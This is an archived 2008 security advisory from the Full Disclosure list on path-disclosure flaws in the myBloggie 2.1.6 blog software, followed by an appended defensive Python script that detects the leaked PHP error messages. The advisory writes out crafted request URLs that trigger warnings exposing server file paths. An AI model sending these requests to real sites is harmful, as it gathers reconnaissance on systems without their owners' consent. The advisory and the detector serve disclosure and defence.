Full Disclosure mailing list archives
myBloggie version 2.1.6 Multiple Path Disclosure Vulnerabilities
From: securityresearch <securityresearch () netvigilance com>
Date: Mon, 30 Jun 2008 16:14:49 -0400
*netVigilance Security Advisory #39*

*myBloggie version 2.1.6 Multiple Path Disclosure Vulnerabilities*

*Description:*
myBloggie <http://mywebland.com/download.php?id=19> is considered one of the simplest, most user-friendly yet feature-packed weblog systems available to date. It is built using PHP & MySQL, the web's most popular scripting language & database system, which enables myBloggie to be installed on any web server. Security problems in the product allow attackers to gather the true path of the server-side script.

*External References:*
Mitre CVE: CVE-2007-3650 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3650>
NVD NIST: CVE-2007-3650 <http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3650>

*Summary:*
myBloggie <http://mywebland.com/mybloggie/> is a weblog system built using PHP & MySQL, the web's most popular scripting language & database system, which enables myBloggie to be installed on any web server.

*Advisory URL:* http://www.netvigilance.com/advisory0039
*Release Date:* June 30th 2008
*Severity/Risk:* Medium

*CVSS 2.0 Metrics*
*Access Vector:* Network
*Access Complexity:* Low
*Authentication:* None
*Confidentiality Impact:* Partial
*Integrity Impact:* None
*Availability Impact:* None
*CVSS Base Score:* 5.0

*Target Distribution on Internet:* Low
*Exploitability:* Functional Exploit
*Remediation Level:* Workaround
*Report Confidence:* Uncorroborated

*SecureScout Testcase ID:* TC 17970

*Vulnerable Systems:* myBloggie <http://mywebland.com/mybloggie/> version 2.1.6

*Vulnerability Type:* Program flaws – The product scripts have flaws which lead to Warnings or even Fatal Errors.

*Vendor:* myWebland <http://mywebland.com/>
*Vendor Status:* The vendor was notified on April 9th 2007, but did not respond.

*Workaround:*
Disable warning messages by setting the following line in the php.ini file: display_errors = Off.

*Example:*

*Path Disclosure Vulnerability 1:*
REQUEST: (PHP <5.0.0 and Windows Hosting are required)
http://[TARGET]/[PRODUCT DIRECTORY]/index.php?month_no=2&year=10000
REPLY:
...
<b>Warning</b>: mktime(): Windows does not support negative values for this function in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> on line <b>28</b><br />
<b>Warning</b>: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> on line <b>28</b><br />
...
<b>Warning</b>: mktime(): Windows does not support negative values for this function in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> on line <b>44</b><br />
<b>Warning</b>: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> on line <b>44</b><br />
...

*Path Disclosure Vulnerability 2:*
REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/common.php
REPLY:
...
<b>Warning</b>: preg_replace(): Empty regular expression in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\common.php</b> on line <b>79</b><br />
...

*Path Disclosure Vulnerability 3:*
REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/login.php?mode[]=login
REPLY:
...
<b>Warning</b>: htmlspecialchars() expects parameter 1 to be string, array given in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\login.php</b> on line <b>39</b><br />
...

*Credits:*
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com <http://www.netvigilance.com>
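
Added example, not part of the original advisory: a Python check that scans captured HTTP response bodies for the PHP error format shown in the REPLY blocks above, so an administrator can confirm that display_errors = Off has stopped the path leak. The function names, sample responses and file paths are constructed for this example.

```python
import re

# Matches PHP's HTML error format as shown in the advisory's REPLY blocks:
#   <b>Warning</b>: func(): message in <b>PATH</b> on line <b>N</b><br />
PHP_ERROR_RE = re.compile(
    r"<b>(?P<level>Warning|Notice|Fatal error|Parse error)</b>:\s*"
    r"(?P<message>.*?)\s+in\s+<b>(?P<path>[^<]+)</b>\s+"
    r"on line\s+<b>(?P<line>\d+)</b>",
    re.IGNORECASE,
)

def find_path_disclosures(body):
    """Return one dict per PHP error in the body that exposes a file path."""
    return [
        {
            "level": m.group("level"),
            "message": " ".join(m.group("message").split()),
            "path": m.group("path").strip(),
            "line": int(m.group("line")),
        }
        for m in PHP_ERROR_RE.finditer(body)
    ]

def leaked_directories(findings):
    """Distinct server directories exposed; accepts \\ or / separators."""
    dirs = set()
    for f in findings:
        head, sep, _ = f["path"].replace("\\", "/").rpartition("/")
        dirs.add(head if sep else "")
    return sorted(dirs)

# Constructed sample responses (paths are made up for this example).
SAMPLE_LEAKY = (
    "<html><body>\n<br />\n"
    "<b>Warning</b>:  htmlspecialchars() expects parameter 1 to be string, "
    "array given in <b>C:\\www\\example\\mybloggie\\login.php</b> "
    "on line <b>39</b><br />\n"
    "<b>Warning</b>:  preg_replace(): Empty regular expression in "
    "<b>C:\\www\\example\\mybloggie\\common.php</b> on line <b>79</b><br />\n"
    "</body></html>"
)
SAMPLE_CLEAN = "<html><body><p>Login</p></body></html>"  # display_errors = Off

if __name__ == "__main__":
    for f in find_path_disclosures(SAMPLE_LEAKY):
        print(f["level"], f["path"], f["line"], f["message"])
```

An empty result for every page of the site after the php.ini change indicates the workaround is in effect for that response format.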